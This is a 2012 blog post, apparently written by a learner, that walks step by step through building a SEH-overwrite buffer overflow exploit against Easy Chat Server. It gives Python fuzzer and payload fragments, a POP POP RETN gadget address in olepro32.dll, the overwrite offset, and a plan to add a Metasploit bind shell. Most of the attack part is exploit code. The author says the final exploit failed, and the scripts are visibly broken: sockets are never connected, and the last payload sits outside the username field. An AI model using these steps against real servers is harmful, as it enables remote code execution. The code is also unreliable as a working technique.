
Rabu, 22 Februari 2012

Exploit Easy Chat Server (SEH & SafeSEH)

oke now we try to exploit Easy Chat Server.

first step

using wireshark for see vulner on Easy Chat Server. after we get a vulner make fuzzer for see how it's can be overflow. for take a header first step register and than we can see result on wireshare

i take this for make a header.
GET /chat.ghp?username=Hafri&password=12345&room=1&sex=1 HTTP/1.1

than from this head i make a overflow at uername. like a fuzzer below

import socket
buf="\x41" * 5000
GET /chat.ghp?username="+buf+"&password=12345&room=1&sex=1 HTTP/1.1"
smagat+= "Host:\r\n"
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)

after we cam make a fuzzer we try to see how it's be overflow.
open easy chat server and press start
 than now run ollyDbg and attach easy chat server than press (F9) on ollyDbg fur running.
 oke now we try to compile our fuzzer. than see on SEH chain we get EIP was over flow by 41414141 this is character .
than now press F9 make EIP on 41414141
second step

searching for an address JMP press view - Executable Modules.
double ckick on modul. i use olepro32.dll module.
than use msfpescan to read the contents of a module if there are SEH and safeSEH therein. now we choose olepro32.dll it's was install on windows, copy file olepro32.dll to backtrack 
olepro32.dll  on 
now try to analysis about this file, whether there is SEH or safeSEH. for analysis follow this step, type on console
root@bt:~# cd /pentest/exploits/framework2/ now try to see it. type

msfpescan -i /root/SINOBI/ollepro32/olepro32.dll | grep SEHandler   enter
 root@bt:/pentest/exploits/framework2# msfpescan -i /root/SINOBI/ollepro32/olepro32.dll | grep DllCharacteristics
DllCharacteristics           0x00000000
from this result i can get a conculation it's dosn't SEH & safeSEH.

klick right on widnows cpu of olepro32.dll file. Search For - Sequence of Commands, and now inputs POP R32, R32 POP RETN on the search input.
press fine and we get address of pop and pop retn

third step

find an offset to overwrite SEH. in this step is the process of looking into how many bytes in the buffer, teroverwirte SEH address. using pattern_create on metasploit 3 for make string pattern which will be used as a buffer to the application fuzzer

customization fuzzer
import socket
buff  ="\x41" * 5000
+"&password=12345&room=1&sex=1 HTTP/1.1"
smagat+= "Host:"+"\r\n"
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)

run easy chat server , attach by ollyDbg and compile fuzzer
press view - SEH chain.
press f9 to see EIP overwrite

than now use pattern_offset for see value of buffer.
./pattern_offset.rb 68413368 enter

./pattern_offset.rb Ah2Ah3
 we get value of buffer 220 and 216 now 
customization fuzzer
import socket
smagat = "GET /chat.ghp?username="
#smagat+= "Host:"+"\r\n"
smagat+= "\x90" * 216
smagat+= "\xCC\xCC\xCC\xCC"
smagat+= "\x41\x41\x41\x41"
smagat+= "\x90" * (5004 - len(smagat))
smagat+= "&password=12345&room=1&sex=1 HTTP/1.1\r\n\r\n"
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
press F9 than see EIP overwrite

fourth step

control the process CPU

enter the address offset from olepro32.dll which has command POP, POP RETN into the fuzzer.
customization fuzzer
import socket
smagat = "GET /chat.ghp?username="
#smagat+= "Host:"+"\r\n"
smagat+= "\x90" * 216
smagat+= "\xCC\xCC\xCC\xCC"
smagat+= "\x54\x5A\xDD\x5E"
smagat+= "\x90" * (5004 - len(smagat))
smagat+= "&password=12345&room=1&sex=1 HTTP/1.1\r\n\r\n"
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
press F9 to continue the process into the memory olepro32.dll

last step 

make shellcode, run msfweb. 
open browser press payload - filter modul choose os::win32 - windows shell bin

contents as shown below

 press genarate and we gat payload

customization fuzzer
import socket
smagat= "GET /chat.ghp?username=Hafri&password=12345&room=1&sex=0 HTTP/1.1"+"\r\n\r\n"
#smagat+= "Host:"+"\r\n"
smagat+= "\x90" * 216
smagat+= "\xeb\x08\x90\x90"
smagat+= "\x54\x5A\xDD\x5E"
smagat+= "\x90" * 10
smagat+="\x90" * (5004 - len(smagat))
#smagat+="&password=12345&room=1&sex=0 HTTP/1.1"+"\r\n\r\n"
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)

oke than now compile fuzzer
ant try to connect useing telnet 
telnet 4444

oke to exploit this stage I have not managed to exploitasinya
i will try more than more.. 

i thing still lots of bad character may still exist, so I have not been able to exploit

@keep smile
be fun

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